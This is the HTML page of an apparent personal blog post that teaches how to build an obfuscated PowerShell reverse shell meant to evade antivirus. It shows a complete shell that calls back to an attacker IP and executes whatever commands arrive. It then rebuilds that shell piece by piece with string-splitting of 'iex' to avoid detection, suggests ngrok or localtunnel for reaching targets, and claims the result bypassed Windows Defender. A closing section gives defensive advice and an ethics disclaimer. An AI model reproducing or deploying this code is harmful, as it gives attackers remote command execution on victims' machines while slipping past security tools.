<!DOCTYPE html>
<html lang="en-us">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    
    <title>My First Post | My Hugo Blog</title>
    <meta name="viewport" content="width=device-width,minimum-scale=1">
    <meta name="description" content="">
    <meta name="generator" content="Hugo 0.145.0">
    
    
    
      <meta name="robots" content="noindex, nofollow">
    
    

    
<link rel="stylesheet" href="/ananke/css/main.min.css" >




    

    
      

    

    

    
      <link rel="canonical" href="http://localhost:1313/posts/my-first-post/">
    

    <meta property="og:url" content="http://localhost:1313/posts/my-first-post/">
  <meta property="og:site_name" content="My Hugo Blog">
  <meta property="og:title" content="My First Post">
  <meta property="og:locale" content="en_us">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2025-03-11T15:11:00+00:00">
    <meta property="article:modified_time" content="2025-03-11T15:11:00+00:00">

  <meta itemprop="name" content="My First Post">
  <meta itemprop="datePublished" content="2025-03-11T15:11:00+00:00">
  <meta itemprop="dateModified" content="2025-03-11T15:11:00+00:00">
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="My First Post">

	
  </head><body class="ma0 avenir bg-near-white development">

    
   
  

  <header>
    <div class="bg-black">
      <nav class="pv3 ph3 ph4-ns" role="navigation">
  <div class="flex-l justify-between items-center center">
    <a href="/" class="f3 fw2 hover-white no-underline white-90 dib">
      
        2025 Blog Posts
      
    </a>
    <div class="flex-l items-center">
      

      
      <div class="ananke-socials"></div>

    </div>
  </div>
</nav>

    </div>
  </header>



    <main class="pb7" role="main">
      
  
  
  <article class="flex-l flex-wrap justify-between mw8 center ph3">
    <header class="mt4 w-100">
      <aside class="instapaper_ignoref b helvetica tracked ttu">
          
        Posts
      </aside><div id="sharing" class="mt3 ananke-socials"></div>
<h1 class="f1 athelas mt3 mb1">Upgrading Reverse Shell to evade AV mechanisms</h1>
<h3>This post will discuss reverse shells in general and how to improve their effectiveness to evade antivirus tools, we will be 
  looking at some of the techniques which can be used to obfuscate and generate robust callback scripts to the attacking machine.  

  I will be using powershell in this scenario, but the techniques mentioned are same regardless of the programming language used.
  Below is an example of a reverse shell script that attempts to connect back to a machine, once executed.
</h3>
  <div>
    <h3>PowerShell Snippet</h3>
          <pre><code>
            # Reverse Shell in PowerShell
            $ip = "192.168.1.100"
            $port = 4444
            $client = New-Object System.Net.Sockets.TcpClient($ip, $port)
            $stream = $client.GetStream()
            $reader = New-Object System.IO.StreamReader($stream)
            $writer = New-Object System.IO.StreamWriter($stream)
            $writer.AutoFlush = $true
            
            while ($client.Connected) {
                $command = $reader.ReadLine()
                if ($command -eq "exit") { break }
                try {
                    $output = (Invoke-Expression -Command $command 2>&1 | Out-String)
                }
                catch {
                    $output = "Error: $_"
                }
                $writer.WriteLine($output)
            }
            $reader.Close()
            $writer.Close()
            $client.Close()
            </code></pre>            
</div>
      <h4>Already, you can tell that this is very suspicious, as it is very easy to guess whats going on. In a nutshell, this code generate a socket connection to the specified IP
          and the port number, once the connection is established, it reads the commands sent by the attacker. </h4>
      
      <h4>Lets see how we can manage to make this a bit harder to detect, for this we will use some obfuscation and encoding
        techniques, this will require refactoring the whole code, so we will start writing from scratch.
      </h4>

      <h1>0x1: Specifying IP and port variables </h1>
      <h4>We will assign the attacking IP and port variables as usual, for testing purposes i have specified
        my local machine's details, for actual testing scenarious, we can use port forwarding using services like 
        ngrok or localtunnel, this depends on your choice in the end.
      </h4>
      <pre><code>
        $ip='192.168.78.1'  # Change this to your listener IP
        $p=9201 #Change this to your Listener Port
      </code></pre>  
      <h4>Alright, Now lets move on to the next step, where we will setup connection with this IP.</h4>
      <h1>0x2: TCP connection to the Attacker's Server</h1>
      <h4>We will use powershell to generate a TCP client to the IP, this is done through the following.</h4>
      <pre><code>
        $t=New-Object Net.Sockets.TCPClient($ip,$p)
        $s=$t.GetStream()
      </code></pre>    
      <h1>0x3: Setting up ASCII Encoding for Data Transmission</h1>
<h4>We will set up ASCII encoding for data transmission. This encoding will be used to convert data into byte arrays that can be sent over the network stream.</h4>
<pre><code>
  $e=[Text.Encoding]::ASCII
</code></pre>

<h4>Now, with the encoding set up, we will initialize the byte array that will be used to hold the data received from the attacker’s server.</h4>
<pre><code>
  [Byte[]]$b=0..65535|%{0}  # Create an empty byte array to receive data
</code></pre>

<h1>0x4: Reading Data from the Attacker’s Server</h1>
<h4>In this step, we will continuously read data from the network stream. The data received will be executed as commands on the victim's system.</h4>
<pre><code>
  while(($l=$s.Read($b,0,$b.Length))-ne 0){
      $d=(New-Object Text.ASCIIEncoding).GetString($b,0,$l)  # Convert the byte array to a string
</code></pre>

<h4>The command received is stored in the `$d` variable, which will then be executed by the next step.</h4>

<h1>0x5: Executing the Received Command</h1>
<h4>Now that we have the command in string form, we will execute it using PowerShell's `Invoke-Expression` (`iex`). This allows us to run any code that is passed over the network.</h4>
<pre><code>
  $r=(&('i'+'ex') ". { $d } 2>&1" | Out-String)  # Execute the received command using Invoke-Expression
</code></pre>

<h4>In this line, we concatenate 'i' and 'ex' to form the `iex` command, which is responsible for executing the string stored in `$d`.</h4>

<h1>0x6: Formatting the Output</h1>
<h4>Once the command is executed, we need to format the output before sending it back to the attacker. We will append the PowerShell prompt (the current working directory) to the result of the executed command.</h4>
<pre><code>
  $r2=$r+("PS "+(pwd).Path+"> ")  # Append the current directory to the output
</code></pre>

<h4>This output will now contain both the results of the executed command and the PowerShell prompt, making it appear as though it is a normal PowerShell session.</h4>

<h1>0x7: Sending the Output Back to the Attacker</h1>
<h4>After formatting the output, we need to convert it into bytes and send it back to the attacker’s machine through the TCP connection.</h4>
<pre><code>
  $sb=$e.GetBytes($r2)  # Convert the formatted output to bytes
  $s.Write($sb,0,$sb.Length)  # Send the output to the attacker’s server
  $s.Flush()  # Ensure the data is sent immediately
</code></pre>

<h4>At this point, the attacker will receive the output of the executed command in the form of a byte array, which is then displayed on their terminal or command interface.</h4>

<h4>This terminates the session by closing the TCP client object that we created earlier.</h4>

<h1>Conclusion</h1>
<h4>I tested this in Windows 11 as well, and it successfully bypassed Windows Defender without triggering any alarms. This isn't necessarily surprising, as many modern antiviruses, including Windows Defender, may fail to detect such simple obfuscation techniques, especially if they rely heavily on signature-based detection.</h4>

<h4>However, this should be taken as a reminder that traditional antivirus software is not foolproof. While it may catch well-known malware based on signatures, more advanced techniques such as obfuscation, encoding, and the use of dynamic behaviors can often slip through unnoticed. This is why it is critical to employ multi-layered defense strategies that go beyond relying solely on antivirus software, such as behavioral detection systems, endpoint monitoring, and proactive security practices like patching and user awareness training.</h4>

<h4>It's important to note that reverse shells like this can be used for both ethical and malicious purposes. In ethical hacking scenarios, reverse shells can be a valuable tool for penetration testing and security assessments, helping to uncover weaknesses before they are exploited by malicious actors. In contrast, using such techniques for unauthorized access is illegal and unethical. Always ensure that any testing is done in a controlled, authorized environment with permission from the system's owner.</h4>

<h4>In conclusion, while reverse shell techniques can be highly effective for gaining remote control of a machine, it is also crucial to continuously improve defenses against them. Security practitioners should stay informed about new attack techniques and apply effective countermeasures, such as intrusion detection systems, behavior-based monitoring, and enhanced network security controls, to prevent exploitation of these vulnerabilities.</h4>

<h4>Remember, ethical hacking is about securing systems and networks, not exploiting them. Always use your skills responsibly.</h4>

    
    <div class="nested-copy-line-height lh-copy serif f4 nested-links mid-gray pr4-l w-two-thirds-l"><ul class="pa0">
  
</ul>
<div class="mt6 instapaper_ignoref">
      
      
      </div>
    </div>

    <aside class="w-30-l mt6-l">




</aside>

  </article>

    </main>
    <footer class="bg-black bottom-0 w-100 pa3" role="contentinfo">
  <div class="flex justify-between">
  <a class="f4 fw4 hover-white no-underline white-70 dn dib-ns pv2 ph3" href="http://localhost:1313/" >
    &copy;  2025 
  </a>
    <div><div class="ananke-socials"></div>
</div>
  </div>
</footer>

  </body>
</html>
